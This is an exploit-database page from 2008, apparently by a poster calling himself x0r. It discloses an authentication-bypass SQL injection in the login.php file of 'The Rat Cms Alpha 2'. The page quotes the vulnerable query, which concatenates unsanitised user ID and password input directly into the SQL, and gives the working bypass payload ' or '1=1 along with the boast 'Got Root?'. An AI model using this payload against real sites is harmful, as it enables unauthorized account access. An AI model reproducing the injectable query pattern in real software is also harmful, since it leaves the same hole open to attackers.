[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-12-15
# Author : x0r
# Previous Title : Mediatheka <= 4.2 Remote Blind SQL Injection Exploit
# Next Title : XOOPS Module Amevents (print.php id) SQL Injection Vulnerability


---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: login.php

	$sql = "SELECT user_id 
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
			
$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 

Exploit: ' or '1=1

^^ Got Root?

# www.Syue.com [2008-12-15]